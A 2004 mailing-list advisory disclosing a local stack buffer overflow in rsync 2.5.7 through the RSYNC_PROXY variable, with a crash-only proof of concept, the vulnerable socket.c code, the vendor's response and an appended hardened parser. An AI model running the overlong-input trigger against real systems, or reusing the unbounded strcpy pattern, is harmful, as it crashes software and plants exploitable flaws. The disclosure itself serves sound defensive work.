Vulnerability Development mailing list archives
rsync <= 2.5.7 local buffer overflow (no root today:)
From: DownBload <downbload () hotmail com>
Date: 9 Feb 2004 21:13:02 -0000
Hi,

There is a local buffer overflow in rsync <= 2.5.7. The problem is in the open_socket_out function (socket.c). An attacker can overflow the portbuf[10] buffer on the stack and overwrite the saved return address. Rsync isn't suid, so no root shell today :-).

PoC example:

  [root@localhost rsync-2.5.7]# export RSYNC_PROXY=`perl -e 'print "A" x 100,":","A" x 1000'`
  [root@localhost rsync-2.5.7]# rsync localhost::
  rsync: getaddrinfo: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA: ai_family not supported
  Segmentation fault
  [root@localhost rsync-2.5.7]#

- socket.c

  ...
      char portbuf[10];
      char *h;
      int proxied = 0;
      char buffer[1024];
      char *cp;

      h = getenv("RSYNC_PROXY");
      proxied = (h != NULL) && (*h != '\0');

      if (proxied) {
          strlcpy(buffer, h, sizeof(buffer));
          cp = strchr(buffer, ':');
          if (cp == NULL) {
              rprintf(FERROR, "invalid proxy specification: should be HOST:PORT\n");
              return -1;
          }
          *cp++ = '\0';
          strcpy(portbuf, cp);    // <- OVERFLOW
  ...

Vendor response:

"Correct. I fixed this in the CVS version earlier this year. Since the proxy data is coming from the local environment, I don't see a need to roll out an update to 2.6.0 (which is the latest released version, BTW). The fix will be in 2.6.1, which should be released in the next month or two."

DownBload / Illegal Instruction Labs
http://www.ii-labs.org
e-mail: downbload[at]hotmail.com

"Born under the lucky star magical, but on this earth generally tragical."
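For comparison with the unbounded strcpy above, here is an added, hypothetical hardened parser for a HOST:PORT proxy string; it is not rsync's code or the vendor's actual fix. It checks the port's length against the destination buffer before copying and validates that the port is numeric and in range, so an overlong RSYNC_PROXY value is rejected instead of overrunning portbuf.

```c
#include <ctype.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical hardened parse of "HOST:PORT" (example code, not rsync's).
 * Returns 0 on success and -1 on any malformed or oversized input.
 * Nothing is written to host/portbuf until both lengths are known to fit. */
int parse_proxy_spec(const char *spec, char *host, size_t hostlen,
                     char *portbuf, size_t portlen, int *port_out)
{
    const char *colon;
    const char *pstr;
    size_t hlen, plen, i;
    char *end;
    long port;

    if (spec == NULL || *spec == '\0')
        return -1;
    colon = strchr(spec, ':');
    if (colon == NULL)
        return -1;                      /* "should be HOST:PORT" */

    pstr = colon + 1;
    hlen = (size_t)(colon - spec);
    plen = strlen(pstr);

    /* Reject rather than truncate: a silently shortened host or port would
     * make the client connect somewhere the user did not intend. */
    if (hlen == 0 || hlen >= hostlen || plen == 0 || plen >= portlen)
        return -1;

    /* The port must be all digits and within the TCP range. */
    for (i = 0; i < plen; i++)
        if (!isdigit((unsigned char)pstr[i]))
            return -1;
    port = strtol(pstr, &end, 10);
    if (*end != '\0' || port < 1 || port > 65535)
        return -1;

    /* Bounded copies: both lengths were checked against the buffers above. */
    memcpy(host, spec, hlen);
    host[hlen] = '\0';
    memcpy(portbuf, pstr, plen);
    portbuf[plen] = '\0';
    *port_out = (int)port;
    return 0;
}
```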